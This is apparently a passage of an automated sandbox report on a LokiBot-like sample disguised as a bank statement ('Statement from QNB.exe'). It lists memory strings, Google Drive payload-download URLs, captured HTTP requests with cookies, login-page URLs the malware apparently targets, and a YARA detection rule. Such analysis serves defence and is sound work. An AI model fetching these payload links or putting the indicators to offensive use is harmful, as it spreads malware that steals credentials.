                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651025400.0000000000698000.00000004.00000020.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/qr
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488930602.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81495319894.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500013187.0000000000955000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491679427.0000000000955000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/v
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81646618008.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81652133637.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81648906007.0000000000741000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmpString found in binary or memory: https://doc-0k-48-docs.googleusercontent.com/~
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmpString found in binary or memory: https://docs.google.com/:5
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmpString found in binary or memory: https://docs.google.com/b5
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488930602.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81489163627.000000000096F000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81495319894.0000000000955000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81500013187.0000000000955000.00000004.00000020.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491294279.000000000096E000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81488546638.000000000093B000.00000004.00000001.sdmp, D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000003.81491679427.0000000000955000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/nonceSigner?nonce=1h1o0go4qslkm&continue=https://doc-0k-48-docs.googleuserco
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/0By
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/F
                    Source: Statement from QNB.exe, 00000004.00000002.81017233540.00000000007F8000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/J
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000017.00000002.81499259133.00000000008DC000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/J4
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 00000019.00000002.81578179889.0000000000A10000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/M
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/T
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81653026045.0000000002400000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000003.81643405594.0000000000741000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNpq
                    Source: Statement from QNB.exe, 00000004.00000003.80961592797.0000000000875000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNprezy-qH_LiFQvT2qU
                    Source: Statement from QNB.exe, 00000004.00000002.81017793700.0000000000842000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNptsv
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651299450.00000000006C3000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNpu
                    Source: D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe, 0000001A.00000002.81651530540.00000000006E0000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/~
                    Source: iexplore.exe, 00000011.00000002.81169528331.00000000030FA000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000002.81169483229.00000000030F5000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000002.81170899396.000000000377E000.00000004.00000001.sdmp, iexplore.exe, 00000011.00000003.81166049858.0000000003787000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
                    Source: iexplore.exe, 00000011.00000002.81170899396.000000000377E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
                    Source: iexplore.exe, 00000011.00000002.81170899396.000000000377E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
                    Source: iexplore.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: iexplore.exe, iexplore.exe, 0000000E.00000002.81114917988.0000000000400000.00000040.00000001.sdmpString found in binary or memory: https://www.google.com
                    Source: iexplore.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: unknownDNS traffic detected: queries for: drive.google.com
                    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9ika2j8t7trtq51k7nrgujctt9nrsl81/1637759700000/06007705055686197661/*/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-00-5k-docs.googleusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
                    Source: global trafficHTTP traffic detected: GET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-48-docs.googleusercontent.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /nonceSigner?nonce=1h1o0go4qslkm&continue=https://doc-0k-48-docs.googleusercontent.com/docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e%3Ddownload&hash=pckr7av56kdraffkce6aepv1b87ssmgu HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: docs.google.comCookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
                    Source: global trafficHTTP traffic detected: GET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download&nonce=1h1o0go4qslkm&user=09438607504833105235Z&hash=0o6b323c0rq74tch8ch7someetivr76b HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheConnection: Keep-AliveHost: doc-0k-48-docs.googleusercontent.comCookie: AUTH_slujndimmid19jcuof4vvgvj59t5oehn_nonce=1h1o0go4qslkm
                    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
                    Source: global trafficHTTP traffic detected: GET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-48-docs.googleusercontent.comConnection: Keep-AliveCookie: AUTH_slujndimmid19jcuof4vvgvj59t5oehn=09438607504833105235Z|1637759775000|us3t0nbh97o1s1g8jtgaiaegnreqqlkj
                    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cacheCookie: NID=511=O8F3WUMpwif_uSvF6NVaoDKCa_B9CVpm3RXpohb-m11hovINlL1qeTsu5byj3kjM026Fjm16vkT9stNprKGWMAzUEBJm3mx3WCYZd3mzWhQ3jL6jz3aEfmVjjbe86H1cSaC9AsZUEFRORqAQuyo3SOepEKrezy-qH_LiFQvT2qU
                    Source: global trafficHTTP traffic detected: GET /docs/securesc/35sumvj0vue2ri2uv2ecasddg28mcdkj/ad6glr8l0h99hqpngtfni6a8i22nv65q/1637759775000/06007705055686197661/09438607504833105235Z/1yzh40PNS32XieWw_X1Kb4gxhZiPD-fNp?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0k-48-docs.googleusercontent.comConnection: Keep-AliveCookie: AUTH_slujndimmid19jcuof4vvgvj59t5oehn=09438607504833105235Z|1637759775000|us3t0nbh97o1s1g8jtgaiaegnreqqlkj
                    Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49804 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49805 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49827 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49828 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.217.168.14:443 -> 192.168.11.20:49829 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49831 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49832 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49834 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49835 version: TLS 1.2
                    Source: Statement from QNB.exe, 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices
                    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 14_2_0040BA30 GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,14_2_0040BA30

                    System Summary:

                    barindex
                    Malicious sample detected (through community Yara rule)Show sources
                    Source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
                    Source: Statement from QNB.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    Source: 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_004017710_2_00401771
                    Source: C:\Users\user\Desktop\Statement from QNB.exeCode function: 0_2_004017240_2_00401724
                    Source: C:\Users\user\Desktop\Statement from QNB.exe